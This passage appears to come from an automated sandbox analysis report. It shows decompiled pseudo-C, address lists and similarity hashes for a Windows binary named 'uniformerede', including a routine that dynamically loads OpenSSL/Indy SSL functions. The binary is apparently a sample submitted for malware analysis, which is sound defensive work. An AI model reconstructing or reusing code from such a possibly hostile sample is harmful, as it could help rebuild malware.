                                                                                                                                                                                                                            							 *__eax = 2;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 1;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xa8;
                                                                                                                                                                                                                            							 *__eax = 3;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 1;
                                                                                                                                                                                                                            							return __eax;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						case 4:
                                                                                                                                                                                                                            							 *(__ebx + 0xd8) = 1;
                                                                                                                                                                                                                            							 *(__ebx + 0x38) = 4;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 0x43;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0x54;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 0x4d;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xa8;
                                                                                                                                                                                                                            							 *__eax = 0x59;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xfc;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 0x4b;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							return __eax;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            						case 5:
                                                                                                                                                                                                                            							 *(__ebx + 0xd8) = 1;
                                                                                                                                                                                                                            							 *(__ebx + 0x38) = 4;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *__eax = 1;
                                                                                                                                                                                                                            							 *(__eax + 8) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0x54;
                                                                                                                                                                                                                            							 *__eax = 2;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 1;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xa8;
                                                                                                                                                                                                                            							 *__eax = 3;
                                                                                                                                                                                                                            							 *(__eax + 8) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 1;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 1;
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40);
                                                                                                                                                                                                                            							__eax =  *(__ebx + 0x40) + 0xfc;
                                                                                                                                                                                                                            							 *__eax = 4;
                                                                                                                                                                                                                            							 *(__eax + 8) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0xc) = 2;
                                                                                                                                                                                                                            							 *(__eax + 0x10) = 0;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x14) = 0;
                                                                                                                                                                                                                            							 *(__eax + 0x18) = 0;
                                                                                                                                                                                                                            							return __eax;
                                                                                                                                                                                                                            							goto L17;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L17:
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            0x0046c887
                                                                                                                                                                                                                            0x0046c88e
                                                                                                                                                                                                                            0x0046c893
                                                                                                                                                                                                                            0x0046c896
                                                                                                                                                                                                                            0x0046c899
                                                                                                                                                                                                                            0x0046c89c
                                                                                                                                                                                                                            0x0046c89e
                                                                                                                                                                                                                            0x0046c8a3
                                                                                                                                                                                                                            0x0046c8a9
                                                                                                                                                                                                                            0x0046c8b0
                                                                                                                                                                                                                            0x0046c8b7
                                                                                                                                                                                                                            0x0046c8ba
                                                                                                                                                                                                                            0x0046c8bc
                                                                                                                                                                                                                            0x0046c8bf
                                                                                                                                                                                                                            0x0046c8c2
                                                                                                                                                                                                                            0x0046c8c7
                                                                                                                                                                                                                            0x0046c8cc
                                                                                                                                                                                                                            0x0046c8ce
                                                                                                                                                                                                                            0x0046c8d4
                                                                                                                                                                                                                            0x0046c8db
                                                                                                                                                                                                                            0x0046c8e2
                                                                                                                                                                                                                            0x0046c8e7
                                                                                                                                                                                                                            0x0046c8ea
                                                                                                                                                                                                                            0x0046c8ef
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c8f0
                                                                                                                                                                                                                            0x0046c8fa
                                                                                                                                                                                                                            0x0046c901
                                                                                                                                                                                                                            0x0046c904
                                                                                                                                                                                                                            0x0046c908
                                                                                                                                                                                                                            0x0046c90e
                                                                                                                                                                                                                            0x0046c915
                                                                                                                                                                                                                            0x0046c91c
                                                                                                                                                                                                                            0x0046c91f
                                                                                                                                                                                                                            0x0046c921
                                                                                                                                                                                                                            0x0046c924
                                                                                                                                                                                                                            0x0046c927
                                                                                                                                                                                                                            0x0046c92a
                                                                                                                                                                                                                            0x0046c92d
                                                                                                                                                                                                                            0x0046c933
                                                                                                                                                                                                                            0x0046c93a
                                                                                                                                                                                                                            0x0046c941
                                                                                                                                                                                                                            0x0046c948
                                                                                                                                                                                                                            0x0046c94f
                                                                                                                                                                                                                            0x0046c956
                                                                                                                                                                                                                            0x0046c959
                                                                                                                                                                                                                            0x0046c95e
                                                                                                                                                                                                                            0x0046c964
                                                                                                                                                                                                                            0x0046c96b
                                                                                                                                                                                                                            0x0046c972
                                                                                                                                                                                                                            0x0046c979
                                                                                                                                                                                                                            0x0046c980
                                                                                                                                                                                                                            0x0046c989
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046c98a
                                                                                                                                                                                                                            0x0046c994
                                                                                                                                                                                                                            0x0046c99b
                                                                                                                                                                                                                            0x0046c99e
                                                                                                                                                                                                                            0x0046c9a2
                                                                                                                                                                                                                            0x0046c9a8
                                                                                                                                                                                                                            0x0046c9af
                                                                                                                                                                                                                            0x0046c9b6
                                                                                                                                                                                                                            0x0046c9b9
                                                                                                                                                                                                                            0x0046c9bb
                                                                                                                                                                                                                            0x0046c9be
                                                                                                                                                                                                                            0x0046c9c1
                                                                                                                                                                                                                            0x0046c9c6
                                                                                                                                                                                                                            0x0046c9c9
                                                                                                                                                                                                                            0x0046c9cb
                                                                                                                                                                                                                            0x0046c9d1
                                                                                                                                                                                                                            0x0046c9d8
                                                                                                                                                                                                                            0x0046c9df
                                                                                                                                                                                                                            0x0046c9e4
                                                                                                                                                                                                                            0x0046c9e7
                                                                                                                                                                                                                            0x0046c9ea
                                                                                                                                                                                                                            0x0046c9ed
                                                                                                                                                                                                                            0x0046c9ef
                                                                                                                                                                                                                            0x0046c9f6
                                                                                                                                                                                                                            0x0046c9fc
                                                                                                                                                                                                                            0x0046ca03
                                                                                                                                                                                                                            0x0046ca0a
                                                                                                                                                                                                                            0x0046ca0d
                                                                                                                                                                                                                            0x0046ca0f
                                                                                                                                                                                                                            0x0046ca12
                                                                                                                                                                                                                            0x0046ca15
                                                                                                                                                                                                                            0x0046ca1a
                                                                                                                                                                                                                            0x0046ca1f
                                                                                                                                                                                                                            0x0046ca21
                                                                                                                                                                                                                            0x0046ca27
                                                                                                                                                                                                                            0x0046ca2e
                                                                                                                                                                                                                            0x0046ca35
                                                                                                                                                                                                                            0x0046ca3a
                                                                                                                                                                                                                            0x0046ca3d
                                                                                                                                                                                                                            0x0046ca42
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0046ca43
                                                                                                                                                                                                                            0x0046ca4d
                                                                                                                                                                                                                            0x0046ca54
                                                                                                                                                                                                                            0x0046ca57
                                                                                                                                                                                                                            0x0046ca5b
                                                                                                                                                                                                                            0x0046ca61
                                                                                                                                                                                                                            0x0046ca68
                                                                                                                                                                                                                            0x0046ca6f
                                                                                                                                                                                                                            0x0046ca72
                                                                                                                                                                                                                            0x0046ca74
                                                                                                                                                                                                                            0x0046ca77
                                                                                                                                                                                                                            0x0046ca7a
                                                                                                                                                                                                                            0x0046ca7d
                                                                                                                                                                                                                            0x0046ca7f
                                                                                                                                                                                                                            0x0046ca84
                                                                                                                                                                                                                            0x0046ca8a
                                                                                                                                                                                                                            0x0046ca91
                                                                                                                                                                                                                            0x0046ca98
                                                                                                                                                                                                                            0x0046ca9f
                                                                                                                                                                                                                            0x0046caa6
                                                                                                                                                                                                                            0x0046caad
                                                                                                                                                                                                                            0x0046cab0
                                                                                                                                                                                                                            0x0046cab5

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • Opcode ID: 677ce04e0d67042dc2a9a4b64202fb5d0def2799379c2ab2145808b1453b9cf8
                                                                                                                                                                                                                            • Instruction ID: 6f579dc5cf93ed67dbe7923bc53dacc3f904af7b4f4082abccb4bc8954db20f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 677ce04e0d67042dc2a9a4b64202fb5d0def2799379c2ab2145808b1453b9cf8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AB15FB1604200CFE748CF19D489B45BBE1BF49318F1680AAD9098F3A7D7BAD985CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E0045FCC8(intOrPtr __eax, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				signed int* _v20;
                                                                                                                                                                                                                            				intOrPtr _v264;
                                                                                                                                                                                                                            				intOrPtr _v444;
                                                                                                                                                                                                                            				intOrPtr _v448;
                                                                                                                                                                                                                            				intOrPtr _v452;
                                                                                                                                                                                                                            				intOrPtr _v456;
                                                                                                                                                                                                                            				char* _v476;
                                                                                                                                                                                                                            				char _v484;
                                                                                                                                                                                                                            				intOrPtr _v516;
                                                                                                                                                                                                                            				char _v536;
                                                                                                                                                                                                                            				void _v668;
                                                                                                                                                                                                                            				char _v684;
                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                            				void* _t120;
                                                                                                                                                                                                                            				intOrPtr _t150;
                                                                                                                                                                                                                            				signed int _t166;
                                                                                                                                                                                                                            				signed int _t170;
                                                                                                                                                                                                                            				intOrPtr* _t188;
                                                                                                                                                                                                                            				signed int _t191;
                                                                                                                                                                                                                            				signed int _t192;
                                                                                                                                                                                                                            				signed int _t199;
                                                                                                                                                                                                                            				intOrPtr _t214;
                                                                                                                                                                                                                            				intOrPtr _t240;
                                                                                                                                                                                                                            				void* _t255;
                                                                                                                                                                                                                            				void* _t257;
                                                                                                                                                                                                                            				intOrPtr _t259;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t255 = _t257;
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E004032B4( &_v668, 0x288);
                                                                                                                                                                                                                            				memcpy( &_v668, 0x49c094, 0x21 << 2);
                                                                                                                                                                                                                            				_t259 = _t257 + 0xfffffffffffffd64;
                                                                                                                                                                                                                            				_v484 =  &_v668;
                                                                                                                                                                                                                            				E0046D02C( &_v484, 0x174, 0x3e);
                                                                                                                                                                                                                            				_push(_t255);
                                                                                                                                                                                                                            				_push(0x460034);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t259;
                                                                                                                                                                                                                            				_push(_t255);
                                                                                                                                                                                                                            				_push(0x45fffd);
                                                                                                                                                                                                                            				_push( *[fs:edx]);
                                                                                                                                                                                                                            				 *[fs:edx] = _t259;
                                                                                                                                                                                                                            				_v536 = 0x45f910;
                                                                                                                                                                                                                            				_v516 = _v8;
                                                                                                                                                                                                                            				_v476 =  &_v536;
                                                                                                                                                                                                                            				if( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)) != 0) {
                                                                                                                                                                                                                            					E00460758(_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)) = E00403BBC(1);
                                                                                                                                                                                                                            				E0041D6C0(_t109, 0, 0);
                                                                                                                                                                                                                            				E0046C400( &_v484,  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 8)));
                                                                                                                                                                                                                            				_t188 =  *((intOrPtr*)(_v8 + 0x2c));
                                                                                                                                                                                                                            				if(_t188 == 0 ||  *((intOrPtr*)( *_t188 + 0x2c))() == 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))() == 0) {
                                                                                                                                                                                                                            					_pop(_t214);
                                                                                                                                                                                                                            					 *[fs:eax] = _t214;
                                                                                                                                                                                                                            					_t120 = E00404424();
                                                                                                                                                                                                                            					return _t120;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v456 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x2c))();
                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x2c))();
                                                                                                                                                                                                                            					_v452 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))();
                                                                                                                                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x28)) + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c)))) + 0x20))();
                                                                                                                                                                                                                            					_v448 = 3;
                                                                                                                                                                                                                            					_v444 = 2;
                                                                                                                                                                                                                            					_v20 = E00429914(1);
                                                                                                                                                                                                                            					 *[fs:edx] = _t259;
                                                                                                                                                                                                                            					_t199 =  *_v20;
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t199 + 8))( *[fs:edx], 0x45ffec, _t255);
                                                                                                                                                                                                                            					E0042AE8C(_v20, 6);
                                                                                                                                                                                                                            					E0046C658( &_v484);
                                                                                                                                                                                                                            					_t200 = _t199 | 0xffffffff;
                                                                                                                                                                                                                            					E0046C55C( &_v484, _t199 | 0xffffffff,  *((intOrPtr*)(_v8 + 0x3f)));
                                                                                                                                                                                                                            					_t150 = _v8;
                                                                                                                                                                                                                            					__eflags =  *((char*)(_t150 + 0x3d));
                                                                                                                                                                                                                            					if( *((char*)(_t150 + 0x3d)) != 0) {
                                                                                                                                                                                                                            						 *((char*)( *((intOrPtr*)(_v8 + 0x28)) + 0x14)) = 1;
                                                                                                                                                                                                                            						E0046C7CC( &_v484, 1);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					__eflags =  *((char*)(_v8 + 0x41));
                                                                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                                                                            						E0046CC34( &_v484, _t200);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v16 = E0042A04C(_v20, _t200, 0, __eflags);
                                                                                                                                                                                                                            					_t191 = E0042A04C(_v20, _t200, 1, __eflags) - _v16;
                                                                                                                                                                                                                            					__eflags = _t191;
                                                                                                                                                                                                                            					if(_t191 <= 0) {
                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                            						_v12 = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						__eflags = _t191 & 0x00000003;
                                                                                                                                                                                                                            						if((_t191 & 0x00000003) != 0) {
                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v12 = _v452;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					E00419804(0, 0,  &_v684, 0);
                                                                                                                                                                                                                            					_push( &_v684);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            					_push(_t255);
                                                                                                                                                                                                                            					_push(0x45ffcf);
                                                                                                                                                                                                                            					_push( *[fs:edx]);
                                                                                                                                                                                                                            					 *[fs:edx] = _t259;
                                                                                                                                                                                                                            					E0046CE4C( &_v484, 0xffffffff);
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						__eflags = _v264 - _v452;
                                                                                                                                                                                                                            						if(_v264 >= _v452) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t166 = E0046CEC0( &_v484, _v12,  &_v16);
                                                                                                                                                                                                                            						_t88 =  &_v16;
                                                                                                                                                                                                                            						 *_t88 = _v16 + _t191 * _t166;
                                                                                                                                                                                                                            						__eflags =  *_t88;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E0046D14C( &_v484);
                                                                                                                                                                                                                            					_pop(_t240);
                                                                                                                                                                                                                            					 *[fs:eax] = _t240;
                                                                                                                                                                                                                            					_push(0x45ffd6);
                                                                                                                                                                                                                            					_t170 = E004027EC();
                                                                                                                                                                                                                            					__eflags = _t170;
                                                                                                                                                                                                                            					if(_t170 != 0) {
                                                                                                                                                                                                                            						_t192 = 0;
                                                                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t192 = 0x64;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t192);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					__eflags = 0;
                                                                                                                                                                                                                            					E00419804(0, 0,  &_v684, 0);
                                                                                                                                                                                                                            					_push( &_v684);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					return E00403DE8(_v8, __eflags);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}
































                                                                                                                                                                                                                            0x0045ff9d
                                                                                                                                                                                                                            0x0045ff9e
                                                                                                                                                                                                                            0x0045ffad
                                                                                                                                                                                                                            0x0045ffaf
                                                                                                                                                                                                                            0x0045ffba
                                                                                                                                                                                                                            0x0045ffbb
                                                                                                                                                                                                                            0x0045ffce
                                                                                                                                                                                                                            0x0045ffce

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteObject
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1531683806-0
                                                                                                                                                                                                                            • Opcode ID: e19e3150e2c7cd44ebb793bf2050a4d8a611c26cac3e0918ad546bb298657608
                                                                                                                                                                                                                            • Instruction ID: 0c536aafc851fcace6ea98d8c72b1a8cfc1ac549c837b81b3b786a54fc8c1cca
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e19e3150e2c7cd44ebb793bf2050a4d8a611c26cac3e0918ad546bb298657608
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85A12C74A002189FDB10DF65C985B9DB7F5FF49304F1081A6E808A73A2DB74AE89CF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004906B8() {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* _t158;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t158 = 1;
                                                                                                                                                                                                                            				if( *0x49d588 == 0) {
                                                                                                                                                                                                                            					 *0x49d588 = LoadLibraryA("libeay32.dll");
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t160 =  *0x49d584;
                                                                                                                                                                                                                            				if( *0x49d584 == 0) {
                                                                                                                                                                                                                            					 *0x49d584 = LoadLibraryA("ssleay32.dll");
                                                                                                                                                                                                                            					 *0x49d454 = E0049058C("SSL_CTX_set_cipher_list", _t158);
                                                                                                                                                                                                                            					 *0x49d458 = E0049058C("SSL_CTX_new", _t158);
                                                                                                                                                                                                                            					 *0x49d45c = E0049058C("SSL_CTX_free", _t158);
                                                                                                                                                                                                                            					 *0x49d460 = E0049058C("SSL_set_fd", _t158);
                                                                                                                                                                                                                            					 *0x49d464 = E0049058C("SSL_CTX_use_PrivateKey_file", _t158);
                                                                                                                                                                                                                            					 *0x49d468 = E0049058C("SSL_CTX_use_certificate_file", _t158);
                                                                                                                                                                                                                            					 *0x49d46c = E0049058C("SSL_load_error_strings", _t158);
                                                                                                                                                                                                                            					 *0x49d470 = E0049058C("SSL_state_string_long", _t158);
                                                                                                                                                                                                                            					 *0x49d474 = E0049058C("SSL_get_peer_certificate", _t158);
                                                                                                                                                                                                                            					 *0x49d478 = E0049058C("SSL_CTX_set_verify", _t158);
                                                                                                                                                                                                                            					 *0x49d47c = E0049058C("SSL_CTX_set_verify_depth", _t158);
                                                                                                                                                                                                                            					 *0x49d480 = E0049058C("SSL_CTX_get_verify_depth", _t158);
                                                                                                                                                                                                                            					 *0x49d484 = E0049058C("SSL_CTX_set_default_passwd_cb", _t158);
                                                                                                                                                                                                                            					 *0x49d488 = E0049058C("SSL_CTX_set_default_passwd_cb_userdata", _t158);
                                                                                                                                                                                                                            					 *0x49d48c = E0049058C("SSL_CTX_check_private_key", _t158);
                                                                                                                                                                                                                            					 *0x49d490 = E0049058C("SSL_new", _t158);
                                                                                                                                                                                                                            					 *0x49d494 = E0049058C("SSL_free", _t158);
                                                                                                                                                                                                                            					 *0x49d498 = E0049058C("SSL_accept", _t158);
                                                                                                                                                                                                                            					 *0x49d49c = E0049058C("SSL_connect", _t158);
                                                                                                                                                                                                                            					 *0x49d4a0 = E0049058C("SSL_read", _t158);
                                                                                                                                                                                                                            					 *0x49d4a4 = E0049058C("SSL_peek", _t158);
                                                                                                                                                                                                                            					 *0x49d4a8 = E0049058C("SSL_write", _t158);
                                                                                                                                                                                                                            					 *0x49d4ac = E0049058C("SSL_get_error", _t158);
                                                                                                                                                                                                                            					 *0x49d4b0 = E0049058C("SSLv2_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4b4 = E0049058C("SSLv2_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4b8 = E0049058C("SSLv2_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4bc = E0049058C("SSLv3_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c0 = E0049058C("SSLv3_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c4 = E0049058C("SSLv3_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4c8 = E0049058C("SSLv23_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4cc = E0049058C("SSLv23_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d0 = E0049058C("SSLv23_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d4 = E0049058C("TLSv1_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4d8 = E0049058C("TLSv1_server_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4dc = E0049058C("TLSv1_client_method", _t158);
                                                                                                                                                                                                                            					 *0x49d4e0 = E0049058C("SSL_shutdown", _t158);
                                                                                                                                                                                                                            					 *0x49d4e4 = E0049058C("SSL_set_connect_state", _t158);
                                                                                                                                                                                                                            					 *0x49d4e8 = E0049058C("SSL_set_accept_state", _t158);
                                                                                                                                                                                                                            					 *0x49d4ec = E0049058C("SSL_set_shutdown", _t158);
                                                                                                                                                                                                                            					 *0x49d4f0 = E0049058C("SSL_CTX_load_verify_locations", _t158);
                                                                                                                                                                                                                            					 *0x49d4f4 = E0049058C("SSL_get_session", _t158);
                                                                                                                                                                                                                            					 *0x49d4f8 = E0049058C("SSL_library_init", _t158);
                                                                                                                                                                                                                            					 *0x49d4fc = E004905FC("SSL_CTX_set_info_callback_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d500 = E004905FC("X509_STORE_CTX_get_app_data_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d504 = E004905FC("SSL_SESSION_get_id_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d508 = E004905FC("SSL_SESSION_get_id_ctx_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d50c = E004905FC("SSL_CTX_get_version_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d510 = E004905FC("SSL_CTX_set_options_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d514 = E00490648("X509_NAME_oneline", _t158);
                                                                                                                                                                                                                            					 *0x49d518 = E0049058C("X509_NAME_hash", _t158);
                                                                                                                                                                                                                            					 *0x49d51c = E00490648("X509_set_issuer_name", _t158);
                                                                                                                                                                                                                            					 *0x49d520 = E00490648("X509_get_issuer_name", _t158);
                                                                                                                                                                                                                            					 *0x49d524 = E00490648("X509_set_subject_name", _t158);
                                                                                                                                                                                                                            					 *0x49d528 = E00490648("X509_get_subject_name", _t158);
                                                                                                                                                                                                                            					 *0x49d52c = E0049058C("X509_digest", _t158);
                                                                                                                                                                                                                            					 *0x49d530 = E0049058C("EVP_md5", _t158);
                                                                                                                                                                                                                            					 *0x49d534 = E004905FC("X509_get_notBefore_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d538 = E004905FC("X509_get_notAfter_indy", _t158, _t160);
                                                                                                                                                                                                                            					 *0x49d53c = E00490648("X509_STORE_CTX_get_error", _t158);
                                                                                                                                                                                                                            					 *0x49d540 = E00490648("X509_STORE_CTX_set_error", _t158);
                                                                                                                                                                                                                            					 *0x49d544 = E00490648("X509_STORE_CTX_get_error_depth", _t158);
